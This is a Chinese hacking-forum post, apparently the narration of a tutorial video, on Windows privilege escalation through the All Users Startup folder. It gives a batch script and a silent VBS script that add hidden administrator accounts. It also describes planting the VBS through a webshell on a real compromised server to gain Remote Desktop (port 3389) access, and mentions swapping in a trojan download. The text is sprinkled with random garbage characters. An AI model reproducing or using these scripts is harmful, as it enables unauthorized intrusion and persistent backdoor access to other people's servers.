- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是8 R- h+ ]' E; R* W+ h
启动 提权
5 |6 K1 i0 |# u% w% ?1 A1 S0 uC:\Docume~1\All Users\「开始」菜单\程序\启动
) t4 L& @0 o% ]& t在这里必须有写入权限 否则此方法无效# T2 M1 ]6 G P
因为我是在网吧 这里显示不了路径$ j* ?9 f0 Q: e; f' H: _& |
我去服务器上演示给大家看
( t P8 |% X) H+ Y% U( l大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的: K9 S, i. C. @$ d# t; ^
文件 从而运行我们的文件
% h% Y4 Z9 W, p* }9 I6 y: c3 E这里有两中方式 第一种是批处理
2 M2 o$ E* C5 B. _3 j6 X我们来看下目前 我机器上的用户组7 J! i8 V+ j* Y1 P% E m0 _# F
目前我们没有521这个用户
7 h, t. x; c! {" U3 u看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示$ v- D( l3 M; @7 A: g; V5 t
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现. ^) E( f# v |5 X3 b1 Q$ o
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
% c# P+ V ^ n5 Q) S& _7 w1 p大家看 已经成功加入了WMMY用户
( ~$ o7 G8 U$ Y! @( G网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了# l5 y6 _: e$ M+ x3 h0 e
当前终端服务端口: 3389
R5 X( N1 d2 g8 z; e+ M7 X系统自动登录功能未开启
" X Y+ L, e0 [- y; e' S3 I2 h9 G7 j) Q3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
" r* m# u( `9 U1 nC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
( P4 V* g$ T0 z. K第一种隐蔽性太差 我们就用第二种吧
a5 [0 ?7 y# Y已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
' s1 z1 `( _7 I7 e9 N9 |从而取得了3389的登陆权限
# C* p4 l4 j! f4 Z0 z# j其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
d2 J$ T) {$ t% ^; ~" k基本原理都差不多 我就不多介绍了
3 K* G, p! B8 ?1 B5 [教程结束```, J, ^3 M4 `6 f3 a/ Q! F7 i
@echo off# l& {7 ?1 h4 u+ n6 s0 T
net user 521 521 /add
) i l, {$ L, unet localgroup administrators 521 /add
) m4 n! e5 _3 R& S; s2 ^) w3 b/ F" q( U3 i$ o
on Error Resume next+ Z" c% I) A/ X7 f% M+ U
set wshshell=createobject("wscript.shell")2 T$ S! u, p& Y: [$ H1 l
a=wshshell.run("net user wmmy$ 1227 /add",0)$ o7 ]( ?' w9 m! t: T& B3 C1 a
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
9 e5 O! J2 r9 e1 Z% u0 N
/ U: c |& ?! u. a! E4 p
4 T6 \- v: O# d3 n1 j' ]1 \点击下载
, s) s* t1 T U1 t+ h2 B/ b |
-
2
评分人数
-
|